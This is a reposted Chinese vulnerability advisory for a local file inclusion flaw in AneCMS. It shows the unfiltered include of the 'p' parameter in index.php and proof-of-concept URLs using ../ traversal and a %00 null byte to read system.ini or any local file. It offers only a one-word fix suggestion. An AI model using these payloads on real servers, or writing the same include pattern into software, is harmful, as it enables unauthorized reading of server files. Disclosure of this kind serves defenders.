来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: AneCMS v.2e2c583 LFI exploit作者Author: I2sec-PJH软件开发网站: https://github.com/AneGroup/AneCMS影响版本: v.2e2c583概述source of index.php页面存在缺陷代码分析如下1. if(isset($_GET......
|
标题: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH 软件开发网站: https://github.com/AneGroup/AneCMS 影响版本: v.2e2c583 概述 source of index.php页面存在缺陷 代码分析如下 1. if(isset($_GET['p'])) 2. include './pages/'.$_GET['p'].'.php'; 3. else 4. include './pages/dash.php'; 测试证明 http://www.2cto.com /acp/index.php?p=../../../../windows/system.ini%00 http://www.2cto.com /acp/index.php?p=../../../../[localfile]%00 www.2cto.com提供修复: 过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
